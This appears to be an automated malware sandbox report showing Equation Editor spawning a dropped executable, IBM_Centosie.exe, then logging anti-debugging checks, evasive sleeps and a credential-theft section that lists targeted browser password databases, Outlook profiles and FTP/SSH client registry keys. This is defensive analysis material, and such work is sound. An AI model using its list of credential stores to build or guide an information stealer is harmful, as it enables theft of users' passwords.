Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3060 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe TID: 2940 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2256 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe API coverage: 7.2 %
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040A615 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 14_2_0040A615
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364055F mov edx, dword ptr fs:[00000030h] 2_2_0364055F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h] 5_2_0040317B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B305D push dword ptr fs:[00000030h] 5_2_001B305D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0026092B mov eax, dword ptr fs:[00000030h] 5_2_0026092B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00260D90 mov eax, dword ptr fs:[00000030h] 5_2_00260D90
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_002633E2 mov eax, dword ptr fs:[00000030h] 5_2_002633E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359055F mov edx, dword ptr fs:[00000030h] 12_2_0359055F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040593F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_0040593F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap, 5_2_00402B7C
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00409509 SetUnhandledExceptionFilter, 14_2_00409509
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040593F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_0040593F
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403B11 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00403B11
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_004077BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_004077BA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: GetLocaleInfoA, 14_2_0040C1CC
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00409897 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 14_2_00409897
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00406069 GetUserNameW, 5_2_00406069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403510 ReadFile,_abort,GetModuleHandleW,GetProcAddress,VirtualProtect,GetVersionExA,GetVersionExW,GetConsoleAliasesA,GetVersionExA,GetVersionExW,GetConsoleAliasesA,SetClipboardViewer,GetTickCount,DisconnectNamedPipe,SetClipboardViewer,CharLowerBuffW,GetTickCount,DisconnectNamedPipe,CopyFileW,CharUpperBuffW,EnumDesktopWindows,UnhookWinEvent,CopyFileW,CharUpperBuffW,EnumDesktopWindows,UnhookWinEvent,LoadBitmapA,_lopen,IsValidCodePage,lstrlenW,SetProcessShutdownParameters,AddConsoleAliasA,GetCompressedFileSizeA,SetThreadPriority,SetCurrentDirectoryA,GetMenuBarInfo,CharToOemBuffA,CharUpperBuffA,GetMenuBarInfo,CharToOemBuffA,CharUpperBuffA,SetLastError,SetLastError,GetLastError,GetLastError,lstrcmpiW,lstrcmpiW,GetWindowsDirectoryW,CreateMutexW,GlobalAddAtomW,GetComputerNameW,GetWindowsDirectoryW,CreateMutexW,GlobalAddAtomW,GetComputerNameW,FileTimeToLocalFileTime,CreateMutexW,LoadLibraryW, 14_2_00403510

Stealing of Sensitive Information

barindex
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: PopPassword 5_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: SmtpPassword 5_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
